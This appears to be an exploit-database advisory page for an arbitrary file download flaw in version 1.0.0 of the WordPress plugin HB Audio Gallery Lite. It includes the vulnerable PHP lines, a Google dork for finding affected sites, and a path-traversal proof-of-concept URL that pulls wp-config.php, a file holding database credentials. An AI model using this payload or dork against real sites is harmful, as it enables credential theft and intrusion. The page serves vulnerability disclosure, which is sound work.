Wordpress Plugin HB Audio Gallery Lite - Arbitrary File Download

vendor:

HB Audio Gallery Lite

by:

CrashBandicot

8,8

CVSS

HIGH

Arbitrary File Download

434

CWE

Product Name: HB Audio Gallery Lite

Affected Version From: 1.0.0

Affected Version To: 1.0.0

Patch Exists: YES

Related CWE: N/A

CPE: a:wordpress:wordpress:4.5.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: MSWin32

2016

WordPress Plugin HB Audio Gallery Lite – Arbitrary File Download

The vulnerability exists due to insufficient validation of user-supplied input in 'file_path' and 'file_size' parameters of '/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php' script. A remote attacker can download arbitrary files from the vulnerable system, which can lead to sensitive information disclosure.

Mitigation:

Update to the latest version of the plugin.

Source

Exploit-DB raw data:

# Exploit Title: Wordpress Plugin HB Audio Gallery Lite - Arbitrary File Download
# Exploit Author: CrashBandicot
# Date: 2016-03-22
# Google Dork : inurl:/wp-content/plugins/hb-audio-gallery-lite
# Vendor Homepage: https://fr.wordpress.org/plugins/hb-audio-gallery-lite/
# Tested on: MSWin32
# Version: 1.0.0

# Vuln file : gallery/audio-download.php

11.   if( $_REQUEST['file_size'] && $_REQUEST['file_path'] ) {
13.       $file_size =  $_REQUEST['file_size'];
15.       $file =  $_REQUEST['file_path'];
17.       $filename = basename($file);
....
55.         Header("Content-Disposition: attachment; filename='" . $filename . "'");


# PoC : /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10


# 22/03/2016 - Informed Vendor about Issue